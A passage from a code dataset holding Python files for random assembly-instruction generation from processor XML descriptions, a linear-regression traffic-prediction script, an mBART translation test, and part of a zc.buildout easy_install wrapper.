isinstance(self.proc_infos[ISSUE_SLOT], dict):\n self.issue_slots = dict(self.proc_infos[ISSUE_SLOT])\n else:\n self.issue_slots = {}\n\n # Set assembly structure\n if isinstance(self.proc_infos[ASSEMBLY_STRUCTURE], dict):\n self.assembly_structure = dict(self.proc_infos[ASSEMBLY_STRUCTURE])\n else:\n self.assembly_structure = {}\n\n # Set immediate\n if isinstance(self.proc_infos[IMMEDIATE], dict):\n self.immediate = dict(self.proc_infos[IMMEDIATE])\n else:\n self.immediate = {}\n\n # Set immediate operand\n if isinstance(self.proc_infos[IMMEDIATE_OPERAND], dict):\n self.immediate_operand = dict(self.proc_infos[IMMEDIATE_OPERAND])\n else:\n self.immediate_operand = {}\n\n\n if isinstance(self.proc_infos[SATURATION], dict):\n self.saturation = dict(self.proc_infos[IMMEDIATE_OPERAND])\n else:\n self.saturation = {}\n\n\n self.setMemoryRange()\n n=3\n\n def __getKeyValue(self, xmlDictionary, key):\n value = xmlDictionary[key]\n if value is None:\n value = \"\"\n return value\n\n\n def setMemoryRange(self):\n self.memory_description = {}\n self.blockedMemoryAddresses = []\n key = PROCESSOR_MEMORY_KEYWORD\n if isinstance(self.proc_infos[key], dict):\n # get start and end addresses\n for memoryDescription in MEMORY_DESCRIPTION:\n if memoryDescription.value in self.proc_infos[key]:\n self.memory_description[memoryDescription.value] = int(self.proc_infos[key][memoryDescription.value])\n\n #get formating information\n self.memory_description[FORMAT] = self.__getKeyValue(self.proc_infos[key], FORMAT)\n for formating in FORMAT_DESCRIPTION:\n if formating.value in self.proc_infos[key]:\n value = self.__getKeyValue(self.proc_infos[key], formating.value)\n self.memory_description[formating.value] = value\n\n\n def _setInstructionXML(self):\n self.instructionXML = self.fetch_xml_data(PATH_INSTRUCTION)[INST_LIST]\n\n\n\n def fetch_xml_data(self, dest: str):\n file = open(dest)\n xml_content = xmltodict.parse(file.read())\n file.close()\n return xml_content\n\n def blockHardRegister(self):\n if BLOCKED_REGISTER in self.register:\n for i in range(len(self.register[BLOCKED_REGISTER][REGISTER_FILE])):\n self._blocked_registers.append([int(self.register[BLOCKED_REGISTER][REGISTER_FILE][i]),\n int(self.register[BLOCKED_REGISTER][REGISTER][i])])\n\n def getInstructionXML(self):\n return self.instructionXML\n\n\n\n instance = None\n\n def __init__(self):\n if not Processor.instance:\n Processor.instance = Processor.__processorParser()\n\n def describe_proc(self) -> str:\n \"\"\"Helper function to read xml structure\"\"\"\n for k, v in self.instance.__dict__.items():\n print(\"%s: %s\"%(k, str(v)))\n\n def parseInstruction(self, assembly: str) -> list:\n \"\"\"return [instruction, registerString]\"\"\"\n if isinstance(assembly, dict):\n assembly = assembly['#text']\n\n temp = assembly.split(\" \")\n returnlist = []\n instruction = temp.pop(0)\n returnlist.append(instruction)\n register = \" \".join(temp)\n returnlist.append(register)\n return returnlist\n\n def getMandatoryFeatures(self, assembly):\n if not isinstance(assembly, dict):\n return {}\n return assembly[MANDATORY_FEATURE]\n\n # For Assembly\n def get_instr_features(self, instruction: str) -> dict:\n inst_xml = self.instance.getInstructionXML()\n if instruction.lower() not in inst_xml:\n return {}\n inst = inst_xml[instruction.lower()] # instruction xml must have the same string with inst name, but lower case.\n\n if instruction is None:\n return self._getDefaultInstructionFeature(inst)\n else:\n return self.append_instr_feature(inst)\n\n def _getDefaultInstructionFeature(self, inst):\n attr_dict = {}\n for key in inst:\n print(key)\n value= inst[key].split(DELIMITER_FEATURE) if inst[key] is not None else [None]\n if key == ISSUE_SLOT:\n value_update = []\n for v in value:\n value_update.append(int(v))\n value = value_update\n attr_dict[key] = value\n\n\n for attr_list in attr_dict.values():\n for ind, value in enumerate(attr_list):\n if value == '':\n attr_list[ind] = None\n\n return attr_dict\n\n def getFeatureValue(self, enabledFeature, instr_value) -> str:\n if instr_value == None:\n return\n if enabledFeature == SIMD:\n return self.instance.proc_infos[SIMD][instr_value]\n\n if enabledFeature == SIGNAGE:\n if instr_value == SIGNED:\n return self.instance.proc_infos[SIGNAGE][SIGNED]\n if instr_value == UNSIGNED:\n return self.instance.proc_infos[SIGNAGE][UNSIGNED]\n\n if enabledFeature == CONDITIONAL:\n if instr_value == COND_SET:\n return self.instance.proc_infos[CONDITIONAL][COND_SET]\n if instr_value == COND_READ:\n return self.instance.proc_infos[CONDITIONAL][COND_READ]\n if instr_value == COND_READ_SET:\n return self.instance.proc_infos[CONDITIONAL][COND_READ_SET]\n\n if enabledFeature == SATURATION:\n if instr_value == PROCESSOR_DESCRIPTION_SATURATION.overflow.value:\n return self.instance.proc_infos[SATURATION][instr_value]\n if instr_value == PROCESSOR_DESCRIPTION_SATURATION.saturation.value:\n return self.instance.proc_infos[SATURATION][instr_value]\n\n if enabledFeature == IMMEDIATE:\n if instr_value in self.instance.proc_infos[IMMEDIATE]:\n return self.instance.proc_infos[IMMEDIATE][instr_value]\n\n\n def getFeature(self, key, index, instrStr:str = None):\n features = self.getAvailableInstructionFeatures(instrStr)\n try:\n return self.getAvailableInstructionFeatures(instrStr)[key][index]\n except:\n m=3\n\n def getAvailableInstructionFeatures(self, instruction: str =None) -> dict:\n \"\"\" return available features supported by the instruction\"\"\"\n if instruction is None:\n instr_attr = self.get_instr_features(INSTRUCTION_DEFAULT_MODES)\n else:\n instr_attr = self.get_instr_features(instruction)\n\n # Make all possible features\n # features = {}\n\n for enabledFeature in instructionFeatureList:\n if enabledFeature not in instr_attr:\n instr_attr[enabledFeature] = [None]\n # features[enabledFeature] = []\n # special case handling of features\n # if enabledFeature ==ISSUE_SLOT:\n # if DEFAULT in self.instance.issue_slots:\n # features[ISSUE_SLOT].append(self.instance.issue_slots[DEFAULT])\n # for i in range(int(self.instance.issue_slots[MAX_SIZE])):\n # features[ISSUE_SLOT].append(i)\n # else: # default handling of features\n # for value in self.instance.proc_infos[enabledFeature].values():\n # features[enabledFeature].append(value)\n\n for enabledFeature in instructionSpecialFeature: # For features that are instruction dependent\n if enabledFeature not in instr_attr:\n instr_attr[enabledFeature] = [None]\n\n # features[enabledFeature] = []\n # for value in instr_attr[enabledFeature]:\n # real_value = self.getFeatureValue(enabledFeature, value)\n # features[enabledFeature].append(real_value)\n\n return instr_attr\n\n def random_enabled_features(self, instruction, probability = 0) -> dict:\n \"\"\"set features to be randomized or not\"\"\"\n\n features = self.getAvailableInstructionFeatures(instruction)\n\n feature_stats = {}\n for key in features:\n feature_stats[key] = features[key][randint(0, len(features[key]) - 1)]\n\n if IMMEDIATE in features:\n if features[IMMEDIATE] != [None]:\n rand_prob = round(uniform(0, 1), 3)\n\n # special handling of immediate Feature\n if rand_prob <= probability:\n feature_stats[IMMEDIATE] = features[IMMEDIATE][-1]\n else:\n feature_stats[IMMEDIATE] = None\n else:\n feature_stats[IMMEDIATE] = None\n\n # warnings.warn(\"Condition is disabled for now!\")\n if CONDITIONAL in features:\n if len(features[CONDITIONAL]) > 1:\n conditionSelected = randint(0, len(features[CONDITIONAL]) - 1)\n conditionValue = self.getAssemlby2Feature(features[CONDITIONAL][conditionSelected])\n\n # todo: remove constraint\n if COND_SET == conditionValue:\n if instruction in TEMPORARY_CONDSEL_ENABLED:\n feature_stats[CONDITIONAL_READ] = \"zero\"\n feature_stats[SIMD] = \"8\"\n else:\n conditionSelected = None\n elif CONDITIONAL_READ == conditionValue:\n condition = randint(0, len(CONDITION_ELEMENTS) - 1)\n feature_stats[CONDITIONAL_READ] = CONDITION_ELEMENTS[condition]\n\n feature_stats[CONDITIONAL] = features[CONDITIONAL][conditionSelected]\n else:\n feature_stats[CONDITIONAL] = None\n\n\n # # todo: remove constraints\n # if instruction in TEMPORARY_CONDSEL_ENABLED:\n # conditionSelected = randint(0, len(features[CONDITIONAL])-1)\n # if \"CS\" == features[CONDITIONAL][conditionSelected]:\n # feature_stats[CONDITIONAL_READ] = \"zero\"\n # feature_stats[SIMD] = \"8\"\n # elif \"CR\" == features[CONDITIONAL][conditionSelected]:\n # condition = randint(0, len(CONDITION_ELEMENTS)-1)\n # feature_stats[CONDITIONAL_READ] = CONDITION_ELEMENTS[condition]\n # n=3\n # feature_stats[CONDITIONAL] = features[CONDITIONAL][conditionSelected]\n # else:\n # feature_stats[CONDITIONAL] = None\n else:\n n=3\n\n # TODO: remove this line, cond beschäftigen, jz immer noch falsch\n #feature_stats[CONDITIONAL] = 0\n return feature_stats\n\n def getInstructionAssemblyString(self, name, enabledFeatures) -> str:\n \"\"\"Get Assembly format in XML then write all features enabled.\"\"\"\n if not enabledFeatures:\n return name\n returnString = \"\"\n tempdict = {}\n\n # Write all features\n for key in self.instance.assembly_structure:\n if key in enabledFeatures:\n tempdict[key] = enabledFeatures[key]\n if INSTRUCTION in key:\n tempdict[key] = str(name)\n if SPACE in key:\n tempdict[key] = \" \"\n if CONDITIONAL_DELIMITER in key:\n tempdict[key] = \"\"\n\n # --Conditions--\n # For Issue slot\n if ISSUE_SLOT in tempdict:\n if isinstance(tempdict[ISSUE_SLOT], int):\n tempdict[ISSUE_SLOT] = ':' + str(tempdict[ISSUE_SLOT])\n elif not tempdict[ISSUE_SLOT]:\n tempdict[SPACE] = \"\"\n\n\n # If instruction already have _xx then dont put conditional things\n if ('_' in tempdict[INSTRUCTION]):\n tempdict[SIGNAGE] = \"\"\n tempdict[SIMD] = \"\"\n\n # For Conditional Delimiter\n tempdict_keys = list(tempdict.keys())\n temp = 0\n\n ## Find index of CONDITIONAL_DELIMITER\n for key in tempdict_keys:\n if key == CONDITIONAL_DELIMITER:\n temp = tempdict_keys.index(key)\n continue\n\n ## If after cond_delimiter there's no value then no '_'\n for key in tempdict_keys:\n index = tempdict_keys.index(key) if tempdict[key] else 0\n if index > temp:\n tempdict[CONDITIONAL_DELIMITER] = \"_\"\n\n # Add all dict to string then return\n for key in tempdict:\n if tempdict[key]:\n returnString += str(tempdict[key])\n\n return returnString\n\n # For Operands\n def get_register_rule(self) -> dict:\n # Get max register eigenschaft\n self.reg_features = {}\n\n # Make num reg files\n self.reg_features[NUM_REG_FILES] = int(self.instance.register[NUM_REG_FILES])-1\n\n # Make reg file size\n self.reg_features[REG_FILE_SIZE] = int(self.instance.register[REG_FILE_SIZE])-1\n\n # Make reg format\n self.reg_features[FORMAT] = self.instance.register[FORMAT]\n\n return self.reg_features\n\n def get_immediate_operand_rule(self) -> dict:\n return self.instance.immediate_operand\n\n def create_register_operand(self, bank: int = 0, register: int = 0) -> str:\n \"\"\"Create register string by modifying format str\"\"\"\n self.reg_format = self.get_register_rule()[FORMAT]\n self.reg_format = self.reg_format.replace('_regFile_', str(bank))\n self.reg_format = self.reg_format.replace('_register_', str(register))\n\n return self.reg_format\n\n def create_immediate_operand(self, value: int = 0, type: str = DEC) -> str:\n # Make immediate operand\n imm_rule = self.get_immediate_operand_rule()\n imm_format = imm_rule[FORMAT]\n\n # immediate type setting\n if imm_rule[type] == None:\n imm_type = ''\n else:\n imm_type = imm_rule[type]\n\n #convert value\n if type == DEC:\n imm_value = str(value)\n else:\n imm_value = self.convert_number(value, type)\n\n imm_format = imm_format.replace('_x_', str(imm_type))\n imm_format = imm_format + imm_value\n\n return imm_format\n\n def convert_number(self, value: int = 0, type: str = BIN) -> str:\n # value is always dec\n # Convert bin\n if type == BIN:\n return_value = '{:b}'.format(value)\n return return_value\n elif type == HEX:\n return_value = '{:x}'.format(value)\n return return_value\n else:\n #error\n return ERROR\n\n def getOperandTypes(self, operandstring: str, enabledfeatures: dict) -> dict:\n # Make dict of operand types.\n # Make dict of operand types.\n oplist = operandstring.split(', ')\n opdict = {key: OPERAND_TYPE.Register for key in oplist}\n if enabledfeatures[IMMEDIATE]:\n last = list(opdict)[-1]\n opdict[last] = OPERAND_TYPE.Immediate\n\n return opdict\n\n def getDefaultOperandType(self, enabledfeatures: dict) -> dict:\n # Make dict of operand types.\n opdict = {}\n for operand in OPERANDS:\n opdict[operand.value] = OPERAND_TYPE.Register\n\n # if enabledfeatures[IMMEDIATE]:\n opdict[OPERANDS.RAND_IMMEDIATE.value] = OPERAND_TYPE.Immediate\n\n # the ordering is important for the correct replacement strategy in assembly\n opdict[OPERANDS.ADDRESS4.value] = OPERAND_TYPE.Address4\n opdict[OPERANDS.ADDRESS3.value] = OPERAND_TYPE.Address3\n opdict[OPERANDS.ADDRESS2.value] = OPERAND_TYPE.Address2\n opdict[OPERANDS.ADDRESS.value] = OPERAND_TYPE.Address\n opdict[OPERANDS.BRANCH_INDEX.value] = OPERAND_TYPE.BRANCH_INDEX\n\n return opdict\n\n def generate_random_operand(self, type: str, enabledfeatures: dict, block: bool = False) -> str:\n # If type is register do:\n if type == OPERAND_TYPE.Register:\n max_reg_file = int(self.get_register_rule()[NUM_REG_FILES])\n max_reg_size = int(self.get_register_rule()[REG_FILE_SIZE])\n self.use_register = self.create_use_register(max_reg_file, max_reg_size)\n self.check = True\n while self.check:\n if self.use_register not in self.instance._blocked_registers:\n if block:\n self.instance._blocked_registers.append(self.use_register)\n self.check = False\n self.reg_operand = self.create_register_operand(bank= self.use_register[0],\n register= self.use_register[1])\n return self.reg_operand\n else:\n self.use_register = self.create_use_register(max_reg_file, max_reg_size)\n\n # If type is immediate do:\n elif type == OPERAND_TYPE.Immediate:\n return self.create_rand_immediate(enabledfeatures)\n elif type == OPERANDS.ADDRESS:\n return self.createRandomMemoryAddress()\n\n def createRandomMemoryAddress(self):\n start =0\n end = DEFAULT_MAX_MEMORY_ADDRESS\n if MEMORY_DESCRIPTION.startAddress.value in self.instance.memory_description:\n start = self.instance.memory_description[MEMORY_DESCRIPTION.startAddress.value]\n if MEMORY_DESCRIPTION.endAddress.value in self.instance.memory_description:\n end = self.instance.memory_description[MEMORY_DESCRIPTION.endAddress.value]\n elements = list(range(start, end))\n for blocked in self.instance.blockedMemoryAddresses:\n elements.remove(blocked)\n address = choice(elements)\n self.instance.blockedMemoryAddresses.append(address)\n return address\n\n def removeMemoryAddress(self, memoryAddress):\n self.instance.blockedMemoryAddresses.remove(memoryAddress)\n\n def get_operands_string(self, operandstrings: str, enabledfeatures: dict) -> str:\n # Make random operand\n self.reg_features = self.get_register_rule()\n self.imm_features = self.get_immediate_operand_rule()\n optypes = self.getOperandTypes(operandstrings, enabledfeatures)\n\n # Make Operands\n oplist = [self.generate_random_operand(typ, enabledfeatures) for typ in optypes]\n\n\n returnstring = \", \".join(oplist)\n return returnstring\n\n def generateRandomOperands(self, enabledfeatures, generateFocusRegister=True, FocusRegister=None):\n operands = self.getDefaultOperandType(enabledfeatures)\n # special case Handling of Rand Value\n if generateFocusRegister:\n operands[OPERANDS.FOCUS_REGISTER.value] = self.generateRandomOperand(operands[OPERANDS.FOCUS_REGISTER.value], enabledfeatures, block=True)\n operands[RAND_VALUE] = self.generateRandomOperand(operands[RAND_VALUE], enabledfeatures, block=True)\n for key in operands:\n block = False\n if not generateFocusRegister and OPERANDS.FOCUS_REGISTER.value == key:\n continue\n if generateFocusRegister and OPERANDS.FOCUS_REGISTER.value == key:\n # block first focus register of interleaving sequence\n continue\n\n if key == RAND_VALUE:\n continue\n operands[key] = self.generateRandomOperand(operands[key], enabledfeatures, block=block)\n while self.isRegisterConflict(operands, FocusRegister):\n operands[RAND_VALUE] = self.generateRandomOperand(OPERAND_TYPE.Register, enabledfeatures, block=True)\n operands[OPERANDS.TARGET_REGISTER.value] = self.generateRandomOperand(OPERAND_TYPE.Register, enabledfeatures, block=False)\n return operands\n\n def isRegisterConflict(self, operands, FocusRegister=None):\n value = (FocusRegister == operands[RAND_VALUE]) or (FocusRegister == operands[OPERANDS.TARGET_REGISTER.value])\n return value\n\n def generateRandomOperand(self, type, enabledFeatures, block=False):\n # If type is register do:\n if type == OPERAND_TYPE.Register:\n max_reg_file = int(self.get_register_rule()[NUM_REG_FILES])\n max_reg_size = int(self.get_register_rule()[REG_FILE_SIZE])\n use_register = self.create_use_register(max_reg_file, max_reg_size)\n self.check = True\n while self.check:\n if use_register not in self.instance._blocked_registers:\n if block:\n self.instance._blocked_registers.append(use_register)\n self.check = False\n reg_operand = self.create_register_operand(bank=use_register[0],\n register=use_register[1])\n\n return reg_operand\n else:\n use_register = self.create_use_register(max_reg_file, max_reg_size)\n\n # If type is immediate do:\n elif type == OPERAND_TYPE.Immediate:\n return self.create_rand_immediate(enabledFeatures)\n elif type == OPERAND_TYPE.Address:\n return self.createRandomMemoryAddress()\n elif type == OPERAND_TYPE.Address2:\n return self.createRandomMemoryAddress()\n elif type == OPERAND_TYPE.Address3:\n return self.createRandomMemoryAddress()\n elif type == OPERAND_TYPE.Address4:\n return self.createRandomMemoryAddress()\n elif type == OPERAND_TYPE.BRANCH_INDEX:\n self.instance.branchIndex +=1\n return self.instance.branchIndex\n\n def getOperandAssembly(self, operandString :str, operandAttributes: dict, overridingTargetRegister=None, isPragma=False, isRandValueRandomImmediate=False):\n \"\"\"\n\n :param operandString:\n :param operandAttributes:\n :param overridingTargetRegister:\n :param isPragma:\n :param isRandValueRandomImmediate: Only modifying operation needs to replace randValue with Immidiate, other is false\n :return:\n \"\"\"\n operandParts = operandString.replace(\",\", \"\").split(\" \")\n operandParts = [str(i) for i in operandParts]\n for operand, value in operandAttributes.items():\n if operand is TARGET_REGISTER:\n if overridingTargetRegister is not None:\n value = overridingTargetRegister\n\n if isRandValueRandomImmediate and operand == RAND_VALUE:\n value = operandAttributes[OPERANDS.RAND_IMMEDIATE.value]\n\n if operand == OPERANDS.RAND_IMMEDIATE.value:\n value = operandAttributes[OPERANDS.RAND_IMMEDIATE.value]\n\n while operand in operandParts:\n index = operandParts.index(operand)\n operandParts[index] = str(value)\n\n\n\n operandString = operandString.replace(operand, str(value))\n\n if isPragma:\n operandResult = \" \".join(operandParts)\n else:\n operandResult = \", \".join(operandParts)\n\n operandResult = self.replacePartialOperands(operandResult, operandAttributes)\n\n return operandResult\n\n def generate_ComparisonCode(self, instr_list : list, focusInstruction, targetInstruction) -> str:\n comparison_code = ''\n for instr in instr_list:\n instr = instr.replace(FOCUS_REGISTER, focusInstruction.getFocusOperand())\n instr = instr.replace(TARGET_REGISTER, targetInstruction.getTargetOperand())\n comparison_code += str(instr)\n comparison_code += '\\n'\n return comparison_code\n\n\n\n def replacePartialOperands(self, operandResult, operandAttributes):\n if operandAttributes :\n\n for keyword in ASSEMBLY_PARTIAL:\n if keyword.value in operandResult:\n operandValue = str(operandAttributes[keyword.value])\n operandResult = operandResult.replace(keyword.value, operandValue)\n\n return operandResult\n\n def isPragma(self, instructionString):\n for keyword in ASSEMBLY_PRAGMAS:\n if keyword.value in instructionString:\n return True\n return False\n\n def create_use_register(self, max_reg_file, max_reg_size):\n return [randint(0, max_reg_file), randint(0, max_reg_size)]\n\n def create_rand_immediate(self, enabledfeatures):\n immediate_String = enabledfeatures[IMMEDIATE]\n return self.createRandImmediate(immediate_String)\n\n def createRandImmediate(self, immediateString):\n # try:\n # immediateString = Processor().getAvailableInstructionFeatures()[IMMEDIATE][immediateString]\n # except:\n # n=3\n for k, v in self.instance.immediate.items():\n if v == immediateString:\n if k == DEFAULT:\n imm_type = PROCESSOR_DESCRIPTION_IMMEDIATE.short.value\n else:\n imm_type = k\n\n\n max_value = int(self.get_immediate_operand_rule()[imm_type])\n val = randint(0, max_value)\n imm_basis = HEX\n reg_operand = self.create_immediate_operand(val, imm_basis)\n return reg_operand\n\n def append_instr_feature(self, inst):\n attr_dict = {}\n for feature in instructionFeatureList:\n if feature in inst:\n attr_dict[feature] = inst[feature].split(DELIMITER_FEATURE) if inst[feature] is not None else [None]\n else:\n attr_dict[feature] = [None]\n\n for feature in instructionSpecialFeature:\n if feature in inst:\n attr_dict[feature] = inst[feature].split(DELIMITER_FEATURE) if inst[feature] is not None else [None]\n else:\n attr_dict[feature] = [None]\n\n\n for attr_list in attr_dict.values():\n for ind, value in enumerate(attr_list):\n if value == '':\n attr_list[ind] = None\n\n feature = {}\n # convert value to Assembly\n for key in attr_dict:\n feature[key] = []\n for value in attr_dict[key]:\n if value == 'None' or value is None:\n feature[key].append(None)\n else:\n try:\n feature[key].append(self.instance.proc_infos[key][value])\n except:\n n=3\n\n return feature\n\n def getRandomIssueSlot(self):\n return randint(0, int(self.instance.issue_slots[MAX_SIZE]));\n\n def getBlockedRegister(self):\n return self.instance._blocked_registers\n\n def getSIMD(self):\n return self.instance.proc_infos[SIMD]\n\n def resetBlockedRegister(self):\n self.instance._blocked_registers = []\n self.instance.blockHardRegister()\n n=3\n\n def resetBranchIndex(self):\n self.instance.branchIndex =0\n\n def reset(self):\n self.resetBlockedRegister()\n self.resetBranchIndex()\n self.instance.blockedMemoryAddresses = []\n\n def getProcessorFeatureAssembly(self, feature, value):\n # if feature == CONDITIONAL:\n # return self.instance.proc_infos[CONDITIONAL_VALUES][value]\n assembly = self.instance.proc_infos[feature][value]\n if not assembly :\n return value\n else:\n return assembly\n\n\n\n def getProcessorFeatureList(self, feature):\n return self.instance.proc_infos[feature]\n\n def getAssemlby2Feature(self, assembly):\n\n if assembly:\n\n for instrFeature in instructionSpecialFeature:\n for key, value in self.instance.proc_infos[instrFeature].items():\n if value:\n if assembly in value:\n return key\n\n\n for instrFeature in instructionFeatureList:\n for key, value in self.instance.proc_infos[instrFeature].items():\n if assembly in key:\n return value\n else:\n return None\n\n\n","sub_path":"util/Processor.py","file_name":"Processor.py","file_ext":"py","file_size_in_byte":29153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"487249528","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\n@author: Nan Ji\r\n\"\"\"\r\nimport numpy as np\r\nimport pandas as pd\r\nimport glob\r\nimport time\r\nimport warnings\r\nfrom preprocess import DataPreprocess\r\nfrom sklearn.linear_model import LinearRegression\r\nfrom sklearn.multioutput import MultiOutputRegressor\r\n\r\nwarnings.filterwarnings('ignore')\r\n\r\ndp = DataPreprocess(inputstep=6,predstep=4)\r\ninputstep = dp.inputstep\r\npredstep = dp.predstep\r\nmaxv = dp.maxv\r\nlink = 257\r\n\r\nprint('loading and partitioning dataset...')\r\nhplist = glob.glob(r'E:/gongtiS/Data/NormalTarget/*csv')[30:47] #July 01-16\r\n#vplist = glob.glob(r'E:/gongtiS/Data/NormalTarget/*csv')[47:55] #July 17-24\r\ntplist = glob.glob(r'E:/gongtiS/Data/NormalTarget/*csv')[55:62] #July 25-31\r\nhist = [pd.read_csv(i,header=None).as_matrix(columns=None) for i in hplist] #historical dataset\r\n#vali = [pd.read_csv(i,header=None).as_matrix(columns=None) for i in vplist] #validation dataset\r\ntest = [pd.read_csv(i,header=None).as_matrix(columns=None) for i in tplist] #test dataset\r\n\r\nprint('preprocessing training data...')\r\ntrainX,trainY,trainY_nofilt = dp.predata(hist)\r\n\r\nmlr = LinearRegression()\r\nprint('model training on trainX...')\r\nstart = time.time()\r\nmlr.fit(trainX.reshape(trainX.shape[0],trainX.shape[1]*trainX.shape[2]),trainY)\r\nend = time.time()\r\n\r\ntrainX, trainY, trainY_nofilt = [], [], []\r\n\r\nprint('preprocessing testing data...')\r\ntestX,testY,testY_nofilt = dp.predata(test)\r\n\r\nprint('#####model predicting on testX...#####')\r\npredY = mlr.predict(testX.reshape(testX.shape[0],testX.shape[1]*testX.shape[2]))\r\n\r\nMAE = np.mean(np.abs(np.asarray(predY).reshape(-1, link) * maxv - np.asarray(testY_nofilt).reshape(-1, link) * maxv))\r\nMAPE = np.mean(np.abs(np.asarray(predY).reshape(-1, link) - np.asarray(testY_nofilt).reshape(-1, link)) / np.asarray(testY_nofilt).reshape(-1, link))\r\nprint('running time:', (end - start))\r\nprint('inputstep=%d' % inputstep)\r\nprint('predstep=%d' % predstep)\r\nprint('MAE:%.4f' % MAE)\r\nprint('MAPE:%.4f%%' % (MAPE * 100))\r\n\r\npd.DataFrame((np.asarray(predY).reshape(-1, link) * maxv), columns=None).to_csv(\r\n r'F:/[磕盐]服务器/NanJi/response/LR-prep%dp%d.csv' % (inputstep, predstep), header=None, columns=None)\r\nwith open(r'F:/[磕盐]服务器/NanJi/response/log-LR.txt', 'a') as f:\r\n f.write('\\ninputstep=%d,predstep=%d,MAE=%.4f,MAPE=%.4f' % (inputstep, predstep, MAE, (MAPE * 100)))\r\n\r\ntestX, testY, testY_nofilt, predY = [], [], [], []\r\n\r\n","sub_path":"mlr.py","file_name":"mlr.py","file_ext":"py","file_size_in_byte":2424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"176984500","text":"import sys, os\nfrom transformers import AutoTokenizer, AutoModelWithLMHead\nfrom transformers import AutoModelForSeq2SeqLM\nfrom transformers import EncoderDecoderModel, BertTokenizer\nimport torch\n\ndef main():\n output_dir = 'enro_finetune_mbart01'\n model_dir = f'{output_dir}/best_tfmr'\n model = AutoModelForSeq2SeqLM.from_pretrained(model_dir)\n tokenizer = AutoTokenizer.from_pretrained(model_dir)\n\n src_txt = ['Some of that money was allegedly funneled back to campaign coffers of the ruling party and its allies.', \n 'According to prosecutors, the scheme at Petrobras involved roughly $2 billion in bribes and other illegal funds.']\n for text in src_txt:\n print(f'src: {text}')\n input_ids = torch.tensor(tokenizer.encode(text, add_special_tokens=True)).unsqueeze(0)\n generated = model.generate(input_ids)\n gen_txt = [tokenizer.decode(t, skip_special_tokens=True) for t in generated]\n print(f'trans: {gen_txt}')\n\nif __name__ == '__main__':\n main()","sub_path":"examples/seq2seq/try_translation_enro.py","file_name":"try_translation_enro.py","file_ext":"py","file_size_in_byte":1017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"45188264","text":"\"\"\"A monkey patch to zc.buildout.easy_install.develop that takes into\nconsideration eggs installed at both development and deployment directories.\"\"\"\n\nimport os\nimport sys\nimport shutil\nimport tempfile\nimport subprocess\nimport pkg_resources\nimport zc.buildout.easy_install\n\nfrom . import tools\nfrom .envwrapper import EnvironmentWrapper\n\nimport logging\nlogger = logging.getLogger(__name__)\n\nrunsetup_template = \"\"\"\nimport os\nimport sys\nfor k in %(paths)r.split(os.pathsep): sys.path.insert(0, k)\nsys.path.insert(0, %(setupdir)r)\n\nimport os, setuptools\n\n__file__ = %(__file__)r\n\nos.chdir(%(setupdir)r)\nsys.argv[0] = %(setup)r\n\nexec(compile(open(%(setup)r).read(), %(setup)r, 'exec'))\n\"\"\"\n\nclass Installer:\n\n def __init__(self, buildout):\n\n self.buildout = buildout['buildout']\n\n self.verbose = tools.verbose(self.buildout)\n\n # finally builds the environment wrapper\n self.prefixes = tools.get_prefixes(self.buildout)\n self.envwrapper = EnvironmentWrapper(logger,\n tools.debug(self.buildout),\n self.prefixes,\n buildout.get('environ', {}),\n )\n\n self.find_links = buildout.get('find_links', '')\n\n def __call__(self, spec, ws, dest, dist):\n \"\"\"We will replace the default easy_install call by this one\"\"\"\n\n # set the environment\n self.envwrapper.set()\n\n # satisfy all package requirements before installing the package itself\n tools.satisfy_requirements(self.buildout, spec, ws)\n\n tmp = tempfile.mkdtemp(dir=dest)\n\n try:\n\n args = [sys.executable, '-c',\n zc.buildout.easy_install._easy_install_cmd, '-mZUNxd', tmp]\n if self.verbose:\n args.append('-v')\n else:\n args.append('-q')\n\n links = self.buildout.get('find-links', '')\n if links: args.extend(['-f', links])\n\n args.append(spec)\n\n if logger.getEffectiveLevel() <= logging.DEBUG:\n logger.debug('Running easy_install:\\n\"%s\"\\npath=%s\\n',\n '\" \"'.join(args),\n os.pathsep.join(tools.get_pythonpath(ws, self.buildout, self.prefixes)),\n )\n\n sys.stdout.flush() # We want any pending output first\n\n exit_code = subprocess.call(list(args),\n env=dict(\n os.environ,\n PYTHONPATH=os.pathsep.join(tools.get_pythonpath(ws, self.buildout, self.prefixes)),\n ),\n )\n\n dists = []\n env = pkg_resources.Environment([tmp])\n for project in env:\n dists.extend(env[project])\n\n if exit_code:\n logger.error(\n \"An error occurred when trying to install %s. \"\n \"Look above this message for any errors that \"\n \"were output by easy_install.\",\n dist)\n\n if not dists:\n raise zc.buildout.UserError(\"Couldn't install: %s\" % dist)\n\n if len(dists) > 1:\n logger.warn(\"Installing %s\\n\"\n \"caused multiple distributions to be installed:\\n\"\n \"%s\\n\",\n dist, '\\n'.join(map(str, dists)))\n else:\n d = dists[0]\n if d.project_name != dist.project_name:\n logger.warn(\"Installing %s\\n\"\n \"Caused installation of a distribution:\\n\"\n \"%s\\n\"\n \"with a different project name.\",\n dist, d)\n if d.version != dist.version:\n logger.warn(\"Installing %s\\n\"\n \"Caused installation of a distribution:\\n\"\n \"%s\\n\"\n \"with a different version.\",\n dist, d)\n\n result = []\n for d in dists:\n newloc = os.path.join(dest, os.path.basename(d.location))\n if os.path.exists(newloc):\n if os.path.isdir(newloc):\n shutil.rmtree(newloc)\n else:\n os.remove(newloc)\n os.rename(d.location, newloc)\n\n [d] = pkg_resources.Environment([newloc])[d.project_name]\n\n result.append(d)\n\n return result\n\n finally:\n shutil.rmtree(tmp)\n self.envwrapper.unset()\n\nclass Extension:\n\n def __init__(self, buildout):\n\n self.buildout = buildout['buildout']\n\n # shall we be verbose?\n self.verbose = tools.verbose(self.buildout)\n\n # replace zc.buildout's installer by our modified version, it will be\n # called indirectly by this extension, via zc.buildout\n self.installer = Installer(buildout)\n\n def develop(self, setup, dest, build_ext=None, executable=sys.executable):\n\n assert executable == sys.executable, (executable, sys.executable)\n if os.path.isdir(setup):\n directory = setup\n setup = os.path.join(directory, 'setup.py')\n else:\n directory = os.path.dirname(setup)\n\n working_set = tools.working_set(self.buildout)\n tools.satisfy_requirements(self.buildout, directory, working_set)\n\n self.installer.envwrapper.set()\n undo = []\n undo.append(self.installer.envwrapper.unset)\n\n try:\n\n if build_ext:\n setup_cfg = os.path.join(directory, 'setup.cfg')\n if os.path.exists(setup_cfg):\n 